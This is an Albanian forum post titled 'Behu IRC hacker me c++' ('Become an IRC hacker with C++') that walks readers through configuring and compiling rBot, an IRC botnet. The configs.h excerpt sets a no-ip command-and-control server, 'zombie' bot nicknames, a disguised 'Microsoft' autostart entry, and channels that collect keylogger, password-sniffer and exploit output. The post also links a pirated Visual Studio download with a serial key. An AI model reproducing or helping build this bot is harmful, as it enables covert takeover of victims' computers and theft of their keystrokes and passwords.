Mesa duket nuk jeni i regjistruar, kliko ne butonin Regjisrohu nqs dëshironi të bëheni pjesë e forumit tonë, per t'u regjistruar ju hargjoni maksimumi 1 min kohë. Me respekt Staffi. 
ForumPortaliCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimiChatBilardo

Share | 
 

 Behu IRC hacker me c++

Shko poshtë 
AutoriMesazh
NoIsY
Super moderator
Super moderator


Postimet : 454
Vendodhja : n'Kamenic
Puna / Hobi : Hacker

MesazhTitulli: Behu IRC hacker me c++   Sat Dec 05, 2009 1:08 am

Me kete program mund te futeni ne PC e kujt te doni qe perdor IRC (internet relay chat) mIRC 6.15

Ne fillim shkarkoni C++ (visual studio 6) FREE
http://www.uhackit.net/c++.rar
Serial--> 812-2224558

Me pas shkoni ne Tools-Opsions dhe klikoni tabin "Directories"
Kerkoni direktorite e meposhtme dhe klikoni ne to:

Kodi:

C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB

Me pas gjeni dhe hapni " configs.h " dhe editoni vetem keto line:

Kodi:

// bot configuration (generic) - doesn't need to be encrypted2001
int port = 6667; // server port (Change to 6667 or the port your IRC uses)

Kodi:

#else // Recommended to use this only for Crypt() setup, this is unsecure.

char botid[] = "Mr Bumbastic"; //Change to what you want the bot to be called
char version[] = "0.1"; // Change What version you want it to be called
char password[] = "password"; // change to a password you will use inside your irc so bots know its you
char server[] = "yournoipduc.no-ip.biz"; // Change to the No-ip DUC address that you made.
char serverpass[] = "paswords"; // Change to the server password you made on ICRplus host
char channel[] = "#bots"; // Change to the channel you made on ICRplus host
char chanpass[] = ""; // Best to leave this blank, we dont need we have a server password
char server2[] = ""; // Does not work so make it blank
char channel2[] = ""; // Does not work so make it blank
char chanpass2[] = ""; // Does not work so make it blank
char filename[] = "crss"; // What you want your bot to be called in Task manger (i think hmmm)
char keylogfile[] = "keylog"; // keylog filename (says it all haha
char valuename[] = "Microsoft"; // value name for autostart (not to important so leave it as microsoft)
char nickconst[] = "zombie"; // change to first part to the bot's nickname in IRC
char szLocalPayloadFile[]=".exe"; // What you want your bot to be called in Task manger
char modeonconn[] = "-xi+B"; // Havnt got a clue so just leave it
char exploitchan[] = "#bots"; // Channel where exploit messages get redirected
char keylogchan[] = "#bots"; // Channel where keylog messages get redirected
char psniffchan[] = "#bots"; // Channel where psniff messages get redirected

Tani ruajeni kete file

me pas hapni rBot.dsw
Do te shihni shume nen-direktori ne panelin e majte, por gje rbot dhe klikoni me tastin e djathte dhe me pas "clean selection only".
Tani klikoni perseri me tastin e djathte dhe me pas klikoni Build
---Once done Your botnet(exe) will be saved in the Debug folder in rx-asn-2-re-worked v3---
Per te marre listen e komandave te botit klikoni ketu: Comands

Mund te shikoni dhe Videon
https://www.youtube.com/watch?v=5Mbc5...layer_embedded
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.deshira-juaj.tk/
 
Behu IRC hacker me c++
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Paneli i Kontrollit :: Gjuhe Programuese-
Kërce tek: